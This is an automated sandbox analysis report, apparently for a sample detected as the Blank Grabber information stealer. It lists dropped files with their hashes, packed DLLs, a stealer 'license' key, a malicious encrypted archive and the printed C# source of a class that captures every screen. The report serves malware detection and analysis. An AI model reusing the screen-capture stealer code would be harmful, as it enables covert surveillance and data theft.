SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.key, Author: Joe Security
Reputation:	unknown
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI73722\select.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.448215150146329
Encrypted:	false
SSDEEP:	768:qnyukFaypXM5IGQGNf5YiSyvTcAMxkEMrX:qnGAaM5IGQGNR7Syb6xuX
MD5:	CCE3E60EC05C80F5F5EE014BC933554C
SHA1:	468D2757B201D6259034215CFD912E8E883F4B9E
SHA-256:	84A81CCA6D80EDD9EC2D31926231DE393ED7F26ED86AE39219ADC5EAB24B8100
SHA-512:	7CBCEE4DD4C817FBEF8B9AEF2D457B56970C5E5C03BDF2CAF74415316B44E7DA33EE39B6A434F4760C80F74C33B5C0C5AD00936D438B947A39FFCD53E890CF0C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q\|'.q\|'.q\|'...'.q\|'q.}&.q\|'q.y&.q\|'q.x&.q\|'q..&.q\|'..}&.q\|'.q}'.q\|'..}&.q\|'..q&.q\|'..\|&.q\|'...'.q\|'..~&.q\|'Rich.q\|'........PE..d...Z..e.........." ...#.0................................................................`......................................... ...L....................`..............l..........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	637720
Entropy (8bit):	7.993319352541641
Encrypted:	true
SSDEEP:	12288:kevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2UTwYqmH:k8oy8x4Rl1dRnxeDlZxsl2MsD0w9mH
MD5:	C6ED91B8FDB99EBA4C099EB6D0EEA5D9
SHA1:	915B2D004F3F07CD18610E413B087568258DA866
SHA-256:	E6E1910E237AC7847748918804D1C414C0F1696A29E9718739312A233EB96D80
SHA-512:	92FE738FCD75E39C6BC9F1EDB3B16A1A7CF3AE6C0D2C29C721B1A5BD3E07A4BB8E8295B3AD3CB44BCEE05A8110855B0FEA66B156461C4F1761C53C15D7E67EE5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302872
Entropy (8bit):	7.986491235737331
Encrypted:	false
SSDEEP:	6144:OtX6biS7ltWh4BvaEyS+KPUR30JlSEwV7hqoUnJG4qKOF6J:OZLS5YiyEFPPl3yqrJG4V06J
MD5:	427668E55E99222B3F031B46FB888F3A
SHA1:	C9BE630CB2536C20BBC6FC9BA4A57889CDB684BC
SHA-256:	9CA1B01048D3867CB002A01A148F279BA9EDAF7B7AD04D17E3E911E445F2D831
SHA-512:	E5CA0DDC2758891090DB726DE2D3FD7F2BA64E309979136B4D3299445B1F751DFD8CD56BB3343499CB6ED479C08732D1D349D32B7F7E5AC417352BD0CE676253
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3m..3m..3m..:...5m......1m......>m......;m......0m......0m..x...1m..3m..cm......2m......2m....j.2m......2m..Rich3m..................PE..d...]..e.........." ...#.`.......0.......@................................................`.............................................X....................@..........................................................@...........................................UPX0.....0..............................UPX1.....`...@...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0t0alidd.ogb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vbftqv5.ofs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_353i4zla.t2u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jg3zipb.tqe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahr4tsto.11p.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bulrx5r5.f20.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnevgeuf.m1u.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyvjdtqw.41i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1g1ichm.xsl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kduusvmw.krf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_loy5dij2.vnu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myu5rkod.nve.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxc1pj2a.lyj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojxjwsem.val.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qujieuy4.pos.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sghjb3sl.bi0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sp525bjd.t5d.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0ilmnej.yni.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yq2e0rlx.1le.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhguffpd.oki.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bALb7.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	729406
Entropy (8bit):	7.999758921958358
Encrypted:	true
SSDEEP:	12288:mryoCQWOiKEsvJFgQvgOTami4MEI7HFbRisPblh9W3xKyvQh0YSdbs459PTLbNBA:mHCQPMmlaminbj3Iyiddbn5RbN3k7
MD5:	CD82356DC5F21242B129D489AAAD4738
SHA1:	AD7539F7F307EE4B0D186817C49BDBD8C24DDB5F
SHA-256:	E1534E40AF42F84ED4180AEC291CE2F06C545202C4B288989F29D3700177907F
SHA-512:	D0FBC4B3E7EDE388BD605093502CE6745BC276DF204CC7E981097593A3BEA930E94365D6F0CF9DAA9279DAE6B6A77B366935EE5108022D1ED4BE01C0BAFF9EDE
Malicious:	true
Reputation:	unknown
Preview:	Rar!......X!.....H.....J4mm}...s!.6....q...P......[..`....Y.a.>'y..w.....W.~..y.tm....T......w.<..Lbq..%#%..%........,D..w...%..P..].f.\|...@qv...`. ..I.~.,,..9.65S.\i.cJY.%W..7cg?.$.z.T.Q..!Ms.!A^=.w..B.....V.-...X~..k.$..\|..e.......u.Y.oZ/.W.>.aR..I:F.TH$b..0...N.)...n.e..,....w..........=..c.......+R....j7._.B...... ....(...f....8zU....$Q. ?J,.....-....vH..d:.K.y.E.../..Gdnt.....#Vz..u......'..'O.9...J..MW..#K]tQ.4......]H....j..&_..K.1O..9.s..74.8....c....?...j?1.\.&)PI..t<5Q.v..yOx0.I..E.nb...Xg.0o..@.Vo....c.0.+.....ZE.....S._...oU.h.I .Q....N;...D"......P.J....k........-.1o.\|....n.....4.f..iZA.-W.....R.3._.../..`.N...p-dx`SS.......Jn:.yS.-..u.1IIx.r&L=[..C.vl.....I..zY0...."....B...;..K.....`$..i@........I/.a54.F.Qf.p.:.0....8.E..q.........{ZA...In.....[1?Nz.O...U....?.a..4......X..C<B....-.~h...J.)/..4.{h......&.G]..fX..;..~..tIr.....^...k..Q..E.a.....k@T~De.....r..~..D@/P.#.+..8..&f<A\..Z6]v.M.?(z.....E...6bh.^.q.v

C:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.083274228953474
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBZIak7Ynqq6ZdPN5Dlq5J:+RI+ycuZhNVIakS0dPNnqX
MD5:	3E5BAE4EAF892895C777CFC9C7A5E1CD
SHA1:	13FC7E467D044F7DED26F8195C5ABC1A102C9770
SHA-256:	F5DF5C0A5135F9A2C9C7D5DD84667D8B801AAD4EB6AF2FC5829C88851D873DCC
SHA-512:	EF535A2A1B21384E791C124A3D71AA1A2E3712A7DC587D7EA4E3BFD62E663747716A110FF48CF2508E381C521ED764E7FB172EE99BFC60FB4D8124A29CCD828E
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.s.e.s.4.c.5.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.s.e.s.4.c.5.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (610), with no line terminators
Category:	dropped
Size (bytes):	613
Entropy (8bit):	5.28856837347535
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5N723T:p37Lvkmb6KOkqe1xBkrk+ik/a4WZETa1
MD5:	43C248E64183843BAB2C0F583786322D
SHA1:	77F87964345D30FC14DEAD0AA3CC2BFAF86C7DE3
SHA-256:	CE2639D2EA86126B63667BD3DB261841809C34918788647C5F0E995CE6F98546
SHA-512:	7F9EA2010060710445554BD578E37C8EF30721E88B7B16E93A6EB037FD5247AA736AFA93032F3A7EDFD290808165B2E9BEBC96D08C63711CFB27559F508707CF
Malicious:	true
Reputation:	unknown
